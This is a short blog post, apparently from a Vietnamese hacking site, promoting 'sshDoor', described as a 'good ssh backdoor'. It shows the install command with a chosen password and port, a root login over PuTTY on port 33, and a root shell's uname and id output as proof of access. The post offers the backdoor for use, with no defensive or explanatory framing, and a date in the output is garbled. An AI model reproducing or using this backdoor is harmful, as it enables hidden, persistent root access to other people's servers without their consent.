sshDoor ( Good ssh Backdoor )

sshDoor ( Good ssh Backdoor )

Usage:
./install passwrod port
./install jancok 33

open putty
ssh port : 33 login : root password : jancok
[root@serv ~]# uname -a;id
Linux serv.test.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 20010 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv ~]#

Không có nhận xét nào

» Tích vào ô "Thông báo cho tôi" để nhận thông báo phản hồi của Admin